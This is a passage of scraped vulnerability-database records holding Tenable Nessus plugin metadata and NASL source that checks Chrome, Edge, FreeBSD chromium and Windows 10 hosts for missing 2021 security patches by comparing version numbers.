script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'89.0.4389.128', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T14:54:49", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 90.0.818.46. It is, therefore, affected by multiple vulnerabilities as referenced in the April 22, 2021 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-04-22T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 90.0.818.46 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_90_0_818_46.NASL", "href": "https://www.tenable.com/plugins/nessus/148939", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148939);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 90.0.818.46 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 90.0.818.46. It is, therefore, affected\nby multiple vulnerabilities as referenced in the April 22, 2021 advisory. Note that Nessus has not tested for this issue\nbut has instead relied only on the application's self-reported version number.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#april-22-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0027f192\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21225\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21226\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 90.0.818.46 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '90.0.818.46' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T14:56:11", "description": "The version of Google Chrome installed on the remote Windows host is prior to 90.0.4430.85. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Google Chrome < 90.0.4430.85 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_90_0_4430_85.NASL", "href": "https://www.tenable.com/plugins/nessus/148848", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148848);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0187-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 90.0.4430.85 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 90.0.4430.85. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70d7f7db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1194046\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195777\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1197904\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 90.0.4430.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'90.0.4430.85', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T14:54:27", "description": "The version of Google Chrome installed on the remote macOS host is prior to 90.0.4430.85. It is, therefore, affected by multiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-04-20T00:00:00", "type": "nessus", "title": "Google Chrome < 90.0.4430.85 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_90_0_4430_85.NASL", "href": "https://www.tenable.com/plugins/nessus/148849", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148849);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0187-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Google Chrome < 90.0.4430.85 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 90.0.4430.85. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2021_04_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?70d7f7db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1194046\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195777\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1195977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1197904\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 90.0.4430.85 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'90.0.4430.85', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T14:56:16", "description": "Chrome Reelases reports :\n\nThis release includes 7 security fixes, including :\n\n- 1194046] High CVE-2021-21222: Heap buffer overflow in V8. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n- [1195308] High CVE-2021-21223: Integer overflow in Mojo. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n- [1195777] High CVE-2021-21224: Type Confusion in V8. Reported by Jose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n\n- [1195977] High CVE-2021-21225: Out of bounds memory access in V8.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n- [1197904] High CVE-2021-21226: Use after free in navigation.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-04-22T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (cb13a765-a277-11eb-97a0-e09467587c17)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CB13A765A27711EB97A0E09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/148931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148931);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (cb13a765-a277-11eb-97a0-e09467587c17)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Reelases reports :\n\nThis release includes 7 security fixes, including :\n\n- 1194046] High CVE-2021-21222: Heap buffer overflow in V8. Reported\nby Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n- [1195308] High CVE-2021-21223: Integer overflow in Mojo. Reported by\nGuang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n- [1195777] High CVE-2021-21224: Type Confusion in V8. Reported by\nJose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n\n- [1195977] High CVE-2021-21225: Out of bounds memory access in V8.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n- [1197904] High CVE-2021-21226: Use after free in navigation.\nReported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11\"\n );\n # https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70d7f7db\"\n );\n # https://vuxml.freebsd.org/freebsd/cb13a765-a277-11eb-97a0-e09467587c17.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?be54099d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21226\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<90.0.4430.85\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-10T03:12:14", "description": "The remote Windows host is missing security update 5003635. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003635: Windows 10 version 1909 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003635.NASL", "href": "https://www.tenable.com/plugins/nessus/150369", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150369);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31951\",\n \"CVE-2021-31952\",\n \"CVE-2021-31954\",\n \"CVE-2021-31955\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31969\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33739\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003635\");\n script_xref(name:\"MSFT\", value:\"MS21-5003635\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5003635: Windows 10 version 1909 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003635. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003635\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003635\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003635'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build: '18363',\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003635])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:09:03", "description": "The remote Windows host is missing security update 5003646. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003646: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003646.NASL", "href": "https://www.tenable.com/plugins/nessus/150374", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# 